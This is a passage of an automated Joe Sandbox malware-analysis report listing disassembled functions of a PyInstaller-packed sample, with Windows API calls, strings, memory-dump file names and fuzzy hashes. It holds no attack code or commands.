                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$ErrorFileFormatLastModuleName
                                                                                                    • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                    • API String ID: 517058245-2863816727
                                                                                                    • Opcode ID: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
                                                                                                    • Instruction ID: 2ded2b5c2a0a65581fc44a5f1b382f551ecfc8286e63e2e85760f546e75e70da
                                                                                                    • Opcode Fuzzy Hash: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
                                                                                                    • Instruction Fuzzy Hash: 4221A461F08642D1FE2ABF25F8113B9D270BF48394FE00532D65D869E5EE2CE906C720

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,00007FF7691A39F2), ref: 00007FF7691A821D
                                                                                                    • K32EnumProcessModules.KERNEL32(?,00000000,?,00007FF7691A39F2), ref: 00007FF7691A827A
                                                                                                      • Part of subcall function 00007FF7691A86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7691A3FA4,00000000,00007FF7691A1925), ref: 00007FF7691A86E9
                                                                                                    • K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF7691A39F2), ref: 00007FF7691A8305
                                                                                                    • K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF7691A39F2), ref: 00007FF7691A8364
                                                                                                    • FreeLibrary.KERNEL32(?,00000000,?,00007FF7691A39F2), ref: 00007FF7691A8375
                                                                                                    • FreeLibrary.KERNEL32(?,00000000,?,00007FF7691A39F2), ref: 00007FF7691A838A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                    • String ID:
                                                                                                    • API String ID: 3462794448-0
                                                                                                    • Opcode ID: 4551d765799ef9b75e00c942335cefe8825730a2f7f2510c4597a22c5cf53bdc
                                                                                                    • Instruction ID: dc9d47760a3d2ca5b22f3a38d267201b2ff75d67f3b73484d5aa69760eebe8c4
                                                                                                    • Opcode Fuzzy Hash: 4551d765799ef9b75e00c942335cefe8825730a2f7f2510c4597a22c5cf53bdc
                                                                                                    • Instruction Fuzzy Hash: 68417C72B196C6C2EA64AF12B4042BAA3A4FF85B80F944135DF5D57B89DE3CE801C760

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 00007FF7691A7B50: GetCurrentProcess.KERNEL32 ref: 00007FF7691A7B70
                                                                                                      • Part of subcall function 00007FF7691A7B50: OpenProcessToken.ADVAPI32 ref: 00007FF7691A7B83
                                                                                                      • Part of subcall function 00007FF7691A7B50: GetTokenInformation.KERNELBASE ref: 00007FF7691A7BA8
                                                                                                      • Part of subcall function 00007FF7691A7B50: GetLastError.KERNEL32 ref: 00007FF7691A7BB2
                                                                                                      • Part of subcall function 00007FF7691A7B50: GetTokenInformation.KERNELBASE ref: 00007FF7691A7BF2
                                                                                                      • Part of subcall function 00007FF7691A7B50: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF7691A7C0E
                                                                                                      • Part of subcall function 00007FF7691A7B50: CloseHandle.KERNEL32 ref: 00007FF7691A7C26
                                                                                                    • LocalFree.KERNEL32(?,00007FF7691A3814), ref: 00007FF7691A848C
                                                                                                    • LocalFree.KERNEL32(?,00007FF7691A3814), ref: 00007FF7691A8495
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                    • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                    • API String ID: 6828938-1529539262
                                                                                                    • Opcode ID: 66c7400c0f842d66862a6c7a5c7e226ffa5096460946b14aa4108adf3e2753a4
                                                                                                    • Instruction ID: c9ab67ecba2405bd3707d9f4ccde63262c900cbab63d9f16b4404932f0a0e6fe
                                                                                                    • Opcode Fuzzy Hash: 66c7400c0f842d66862a6c7a5c7e226ffa5096460946b14aa4108adf3e2753a4
                                                                                                    • Instruction Fuzzy Hash: 24213031A08685C2F618BF61F4153E9A2B4FB84780FE44436EA4D53B96DF3CD945C760

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$ByteCharMultiWide
                                                                                                    • String ID: Error/warning (ANSI fallback)$Warning
                                                                                                    • API String ID: 1878133881-2698358428
                                                                                                    • Opcode ID: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
                                                                                                    • Instruction ID: 9d207bdff46f80c24b73023a51e38733ac9079c85033961b2fa41e774263a076
                                                                                                    • Opcode Fuzzy Hash: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
                                                                                                    • Instruction Fuzzy Hash: 6A115872628A85C1EB28AF11F451BA9B378FB44B84FE05136DA9D47A44DF3CDA09CB50
                                                                                                    APIs
                                                                                                    • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7691BC25B), ref: 00007FF7691BC38C
                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7691BC25B), ref: 00007FF7691BC417
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ConsoleErrorLastMode
                                                                                                    • String ID:
                                                                                                    • API String ID: 953036326-0
                                                                                                    • Opcode ID: 1f18d30cb6731d2276149ea46625d8d438ffcaf3b5eb5be8e43e25f336112fa7
                                                                                                    • Instruction ID: bed1e4dd73bf7a8061988640a79e5398d00ae7535076ccc8f4a81f5cab03360c
                                                                                                    • Opcode Fuzzy Hash: 1f18d30cb6731d2276149ea46625d8d438ffcaf3b5eb5be8e43e25f336112fa7
                                                                                                    • Instruction Fuzzy Hash: C991C572F08651C5FB59AF69B4802BDABB2BB44B88FB44135DE0E57A98CE3CD541C720
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 1279662727-0
                                                                                                    • Opcode ID: ebea2a15e315379b7438f17c06ac6f564ef77e5ce815d722b4931623952d3bd6
                                                                                                    • Instruction ID: c2eeb7f67fa1e534e526dd6ba652d07add4fafd3948086991fac0e0a2c5cdccf
                                                                                                    • Opcode Fuzzy Hash: ebea2a15e315379b7438f17c06ac6f564ef77e5ce815d722b4931623952d3bd6
                                                                                                    • Instruction Fuzzy Hash: 3141A422E18782C3F758AF21A550379A271FB98764F60D334E69D03AD9DF7CA1E08720
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                    • String ID:
                                                                                                    • API String ID: 3251591375-0
                                                                                                    • Opcode ID: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
                                                                                                    • Instruction ID: bfec92e3096652305083d854b917d71b81dec52d2203318917b55f33305ec71f
                                                                                                    • Opcode Fuzzy Hash: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
                                                                                                    • Instruction Fuzzy Hash: 7C313815A4C243C2FE1DBF64B6513B9A2B19F41784FE44035E90E8BAD7DE2CAC04C675
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                    • String ID:
                                                                                                    • API String ID: 1703294689-0
                                                                                                    • Opcode ID: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
                                                                                                    • Instruction ID: 10f045a32a5edf8b4d635272e143ea51e5789b26839b77cb43b70708e02479d1
                                                                                                    • Opcode Fuzzy Hash: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
                                                                                                    • Instruction Fuzzy Hash: 89D06714B59606C7EA5C3F70785917992365F58B01FA41879D84B46397CD2CA80D8660
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 3215553584-0
                                                                                                    • Opcode ID: 9ca15b9002a87b72fd1966d073ee072d8ab2af6885046d3198ed673a4b76404c
                                                                                                    • Instruction ID: 5d3803f92845211881e63d25be5c5f99ac52e72a5e15fca33c32aa2e28fcc336
                                                                                                    • Opcode Fuzzy Hash: 9ca15b9002a87b72fd1966d073ee072d8ab2af6885046d3198ed673a4b76404c
                                                                                                    • Instruction Fuzzy Hash: FB51DA61B09252CAF62DBE26B40067AE6B1BF44BB8FA44634DD7D47BD5CE3CD8019720
                                                                                                    APIs
                                                                                                    • FindCloseChangeNotification.KERNELBASE(?,?,?,00007FF7691B9CE5,?,?,00000000,00007FF7691B9D9A), ref: 00007FF7691B9ED6
                                                                                                    • GetLastError.KERNEL32(?,?,?,00007FF7691B9CE5,?,?,00000000,00007FF7691B9D9A), ref: 00007FF7691B9EE0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ChangeCloseErrorFindLastNotification
                                                                                                    • String ID:
                                                                                                    • API String ID: 1687624791-0
                                                                                                    • Opcode ID: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
                                                                                                    • Instruction ID: a0043869fd1f88a6122e54dd6c9e6b79920fa177b9c3f9d4a6f96f98f6811713
                                                                                                    • Opcode Fuzzy Hash: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
                                                                                                    • Instruction Fuzzy Hash: D3218711F1C642C1FE987F61B59037DA6B35F947A4FB84235DA2E477D9CE6CA4418320
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                    • String ID:
                                                                                                    • API String ID: 2976181284-0
                                                                                                    • Opcode ID: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
                                                                                                    • Instruction ID: edd4a2c957f701c729d504657b930d7a95042024010cfe5e7d82f6c8050b47bb
                                                                                                    • Opcode Fuzzy Hash: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
                                                                                                    • Instruction Fuzzy Hash: 99119161B18A91C1DA54AF26F884169B372BB44BF4FA84331EE7E47BE9CE7CD0508750
                                                                                                    APIs
                                                                                                    • RtlDeleteBoundaryDescriptor.NTDLL(?,?,?,00007FF7691C2032,?,?,?,00007FF7691C206F,?,?,00000000,00007FF7691C2535,?,?,?,00007FF7691C2467), ref: 00007FF7691B9C6E
                                                                                                    • GetLastError.KERNEL32(?,?,?,00007FF7691C2032,?,?,?,00007FF7691C206F,?,?,00000000,00007FF7691C2535,?,?,?,00007FF7691C2467), ref: 00007FF7691B9C78
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: BoundaryDeleteDescriptorErrorLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 2050971199-0
                                                                                                    • Opcode ID: 9fa0b27d1784483699343fce5d0d8fb71a2fef38db5c10c130c8b92919593777
                                                                                                    • Instruction ID: 8b76f08f711d2ddd62f3517543b504286192dcfc38b46fffa22cdedf7af79b65
                                                                                                    • Opcode Fuzzy Hash: 9fa0b27d1784483699343fce5d0d8fb71a2fef38db5c10c130c8b92919593777
                                                                                                    • Instruction Fuzzy Hash: 1FE08C10F08642C3FF0C7FF2B89407992B29FA8700BE48030C91E872A5EE2C68468630
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 3215553584-0
                                                                                                    • Opcode ID: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
                                                                                                    • Instruction ID: 32ce4742f2c3880c45a5b0e5e16a1bdfc2d66e0da6f8150cd1ca27090b7cb1fa
                                                                                                    • Opcode Fuzzy Hash: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
                                                                                                    • Instruction Fuzzy Hash: 8241D332908201C7EA28AF15B59127DB3B2EB55B94FA40131D69E87AD8CF3CF502C760
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _fread_nolock
                                                                                                    • String ID:
                                                                                                    • API String ID: 840049012-0
                                                                                                    • Opcode ID: 3ee270460560d51d175181f77da1ca21b78b4db27da0fa98a8bd59cb7ebf2586
                                                                                                    • Instruction ID: 6f79cfd9432875a84dd3bbbc2d39a909d240b9ffa5eccfb5efc51e3e76127f0f
                                                                                                    • Opcode Fuzzy Hash: 3ee270460560d51d175181f77da1ca21b78b4db27da0fa98a8bd59cb7ebf2586
                                                                                                    • Instruction Fuzzy Hash: 20219611F08651C5FA18BE96B5083BAE6A1BF45BD4FE84431EE0D07B8ACE7DE941C710
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 3215553584-0
                                                                                                    • Opcode ID: 49c1b702f419c8ad0ef71248902cf9a0cc608428026b1214a1a74e14a7199740
                                                                                                    • Instruction ID: 9347c6d57750f04b78ff00014c1fd94af4c5ce005d4ecfb38a6ce5a9ff26a639
                                                                                                    • Opcode Fuzzy Hash: 49c1b702f419c8ad0ef71248902cf9a0cc608428026b1214a1a74e14a7199740
                                                                                                    • Instruction Fuzzy Hash: B731A021A18662C2F759BF15E8413BDA6B2AB50BB0FE54135EA6D433E6CE7CE4418330
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                    • String ID:
                                                                                                    • API String ID: 3947729631-0
                                                                                                    • Opcode ID: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
                                                                                                    • Instruction ID: 1b6e18f1b43ee7a29d32509c3ee8fbfb4a25623635a25c5396ca3e6c7b488ca3
                                                                                                    • Opcode Fuzzy Hash: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
                                                                                                    • Instruction Fuzzy Hash: F921A372A15706CAEB18AF64D4402EC73B1FB04B18FA40676D72C06AC9DF38E445C750
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
